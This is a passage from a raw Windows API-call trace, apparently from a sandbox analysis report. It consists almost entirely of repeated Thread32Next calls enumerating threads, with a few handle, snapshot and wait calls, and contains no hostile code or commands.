lpte=0x14fe78) returned 1 [0242.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.506] CloseHandle (hObject=0x17c) returned 1 [0242.506] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x110c) returned 0x17c [0242.506] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0290.613] CloseHandle (hObject=0x17c) returned 1 [0290.613] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0290.627] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.050] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.633] Thread32Next 